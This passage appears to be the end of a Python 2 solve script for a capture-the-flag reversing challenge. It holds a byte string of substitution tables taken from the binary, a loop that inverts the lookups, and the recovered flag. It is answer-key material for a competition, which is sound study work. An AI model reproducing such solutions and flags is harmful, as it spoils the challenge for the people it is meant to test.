j\xb7)h4\x8f\'@\tiz\xd8Q\x00d\xf2\xdf\xce\x02D\x9ebU\xd5\xd0\xac\xc2\xefK\xde\x04\xa0a\xcf\xeco*\x07\xb0\x9cv&I/\x80t,\x93\xf6\xaf\x81\xd3\xc0J`\x1b"\xebg5q\xf5C\x8d\xa21\r\xfe\xa1\xc9\xa9w\x83\x88\xc4\n\xba\x0e\xf0\xadl\x18\xfc\x99\xbc\xcbk\x91|\xab\xff\x0f\xe20\xc6\x82\xfb\xe6\xa3\xbe\xccO\xc8\xb9\xdbu\xf4(\xeeFX\x9a\xe1\xea\xe9L\x85\xd1\xe4V\x1fs7]\xbfx\x1a-\xed{:\x8c\xa4\xb8\x0c\xd4\x11\xfdy\xd7Hf\xc1W\x063\xf1\xbb%P\xcd\xf9\xe5G\x05\x01\xf8$\xe8\x8b\x95\xa7\xc3\x03\xcaTn\x92R\x8e\xa8\x94\xf7}\x1d\x19e9\xd2\x17\xfa\xb6\xaamc>Y\x08\xc5\xbd\xf3\x1e\x84=.\xe3\xb36E\xbd{\x1e\x9cG=\xec\x19J\x9d@\xa5#\x91v\xaac\x0f\xf3|\xea8\xf9\xe9^!O\'\xcb\xdb\xa7x\xc8\x10Sl\x04\xbe,h/\x95Hp\x88\xba\xfd\x89\xa0DI\x1d]\xfa\n\x1a2\x18\xa2\x80\x8f\t\x84+q\xcd\xeb\x87\xb9)7a\xb5\xd2\xb3\x96Zt\xda\xa4\xe7_~\xa6\x82i\\1"T\x94\xc6\x13\xe1M[\xa9\xd1\xd8\xdc6\xac\xbfu}r\x93\x0e\xe2\xefj\xe8yw\x06\x1b4F\xf1&z\x86E\x11\x8e\xdd\xd03\x14\x05CP\xbb\xbc\xc9>\xcf*\x02\xc2\xcc\xd6N\xab\xb0$s\xc1m\xc5Q\x15\xadV\xb2K-\x83\xfe\xdf.\x8b\xc3\xd5:\x16\x8a\xfb\xc4\xd4Bo0\xca\xb6\xd9?Ln\xa8\xb1Y\xce R\x99\x1f\x0b\xf7\x98\xf4\xe6\xa1W\xf2\x9f\xc7\xee\xf0k\rA\x01\x08\x00g\xf6`\x07\xe5\xde\xff(\xe3\x90\xf8\xb4\x1c<\xe0\xaf\xe4b\x81\x97\x85;\xb8\x7f\x9b\xc0\xd7X9d\xb7\x0cU\x12\xae\x9a5%\x17\x92\xa3\xed\x8d\xfc\x9e\xd3\x8ce\x03f\xf5{~\xe0\x06\xbfs\x1f*\x82\xae\xc3\xc9\xff\x88|g\x96\xe7\x16D\xb7HwN\xa0Q\xe3-\\v\xa4B\x95\xc2\xb24\x91\x92\xc8\xaa\xd9\x8b\'\x03\xc48F[>\xcay\to\xdc\xd1\xb4\xbeh\xcd\xb8),V\x07n\x0b\xa3\x17=q+\xc1\x85\x11;j0\xdf\x14\xee\xe2Sr1\x83x\x0cAz\x02\n\xf3\xa2\x13\x94\xd7\x9b\x97\x90p\xe9Om\xd0\xf4\x8f\x1a\x7f\x1c\x98\xcc\x05\x9d\xf5t\x9e\xba@\xf9\xfc\xded\x81\xfb]\xc5\x08\xbc\xd5\x19\xdb\x9a\xb9\x87\x89\xad\x00\xac\x0e\x1e\xb6\x8e\x9f^:\xd4\x99\xfa\xf7\xb0aG?\xf8\xce5P E\xd3W\xa6\xb1\xec\xef\x8c\xe4\xdd2\xb39\x1b\r\xeaY\xe8\xa9\xfd\x01\xd6!\x04\xa16\xbd7\xf6$\xda_\xa7i\xc6\x0f\xf0}\xbbu\xe6\xb5\xc0\xcf\xaf\x80l\xa8\xd2I\xf1CT\xf2K\xabR&`b\xc7(\x84\xeb\xe1%\x15<\xe5\xd8c\x9c\x1dXU\x93\x18fJ"Lk\x12\x8ae\xa5.\xcbZ/\x8d\x86\xed3M#\xfe\x10\x19p\x9c:I\x80\x8c\x9f2,7L\x96Wfc\'#)3\x94\xe4B-\x88d\xa5\x9a\xd0\xd1\x910\xec\xaa\x89D\xa8H\\t\n\xb2\xf5\xd4>[\x8f\x03\xd2\x10\xc0\xb6\x00j@U\xb3n\x9d\x9e\xea\xe7\xb9A\xb0z\xe6\xa3?\xa0\x90\x8d$\xfb5\xe5\xdf\xd6_\x8e\x1a%\x06\xe2VQ\x17.^\x12\xde\x81\xcdr\x0e; 9\xbfq\xe1\xf2\xf7F\xe9\xa4i4{Nl|w\xbaZ\x85\xad\xcaY\xc9u\t\xd7\x8b\xf9\x97xv\x08!\xa6\x13\xfe\xdah\xeba\xc11\x16\xb7`6K}\x84\xf1\x92\xe88\x95(\xceX\x1f\x99&\x82\x14\x07*\x0b\xb1k\x86\xac\xc2P\xcc\x0cG\xb5\xdc\xcb\x02\x87+O\xdd\x0f\xee\xc3\xc8g\xf0\x05\xffeo\x1c\xfa\xa1\x83\x18\x8a"b\xd5\xf6\xbbR\xbe\xa7\xd8\x1e\xe3\xc7\xf8~\xbc\xbd\xd3\xb4\x15\xd9]\xdb\xaf\xab\xc5\r\xf4\xb8T<J=C\xcf\xa2\xefEy\xe0/\x9b\xc4M\x98\x7fm\x11\xfd\x1b\x93s\xc6\x01\xed\x1d\xa9\xfcS\xae\x04\xf3%\xa6\x90\x8fu\x7f\x97\xb4od\xceQ\x1c\x83\xed\xdd\xd8g\xc9\xa2\xb870\xf2\xb3/\xa1\xae\xa54@\xd7Z$m\xdf\x13\xb9\x94\xf9\xafFf\x01\x15TqN\xbc\xb2\xfbt\xe9\xfa\xb6\x9ca(J\xf4\xf5\x18!\xe3b\x8dK\xee`Wc\xcdz\x0f\x89\x1a\x04\r\x91\x0c\xf6\xe61#|hjIx\xd9_\x1d\xa7\xe8\x1fC\x80\x86\xfe\x07\xc0\xec\x84n\xc1\x12e\xcfS\x08\x8cr{\x11\x02\xe0\x81\x8eB\x00\x9d>\xa3\xb5\xde\xe1\x10\x88M\xc4\xa4A,38?\xa9\xb7i.\xe4v\xaa\xeb\xd1\x8bO\x05\xf1\xb1\xc8*\x99\xd5-\x96)\xc6\xf0\xba\x0bw6\xabE\n\xdb\x8aV\xef\xf3\xe5\xc3\xcb:\xbd\xad\xd0l\\\xf7\x1b2}\x19\xd6\xe7G^\x85\xda\x95\'=\x87\xc5\t\xa0\xb0D<P\xcc\x98LU yp\xdc\xd4\xe2[\xd3\x069\x9e\xc7\x93\xff\x03\xa8R\x9a\x0e~\xbe\xf8\x9f\xfd;k\xbbH+\x14"Y5X\x17]\x92\xea\xc2\xbf\x1e\xac\x82\x16s\xfc\xca\xd2\x9b&%\x1f\x9e\x1d\x04\xfb\x11\xbe\r\x15M\xb6$G\x88\xc2\x92X\x93\x0c\xc66(\xf9]z\xa8\x90\x02g\x80\xdd\xb5#s3\xab\xbb \xd2,\xe1\xf4:oF\xfcj7i5<U\x1e\xa4.\x18\n\xd80\xbcJV>\xae|![\x9bh\xc0\xee\x01\x0b\x0f\x8a\xfeZ\x82v\xa9\xb7\xb2\xe6C\xe7\xfd\x91/\x17\xb4\xeb\x8d\xb1k\xc4\x1c\x12\x7f\xdeB\xf7\x8e^\x16\xbfNW\xa6t@\xdc\xc7\xd1\xe8\xef\x95\x94yO;4\xb9\x87+\xf3e\xdf\x84\xd4f\xf2\xd02m\x13\xc3`qp\xa0\xa1\xc8R\xa5n\x99l\xe5\xba\x85\x06\x08\xeaA\xed\x9adx\x07\xb0c\xcc\xff\xf8\xe4{I\xf5QK-\xd7\xa3\x19\x1b\xd5\xe3\xdb\xecD\x00}\xa2H\x97?b\x89Y\x83T\xcdr\x981*\xac\xf0E\x9d_=\'a\xc9)\xf1\xce\xd3\xad\x03\x96\xaf\x81\x9c\xf6\xc1\t~\xfa\\\x8b\x1a9\xe2\xda\xd9S8\xb3\x9f\xbd\x8f\xaa\xc5\x05"\x86w\xcb\xd6\x10&\xe0u\x8c\x0e\xb8\xca\xa7\x14\xcfL\xe9P' # get this from binary


flag = ''

for i in range(20):
    cuk = akhir[i]
    for j in range(19, -1, -1):
        print cuk.__repr__()
        cuk = chr(sate[j * 0x100:(j + 1) * 0x100].find(cuk))
    flag += cuk
print flag

flag : Arkav5{SB0x_r3ver5ing_50_ez}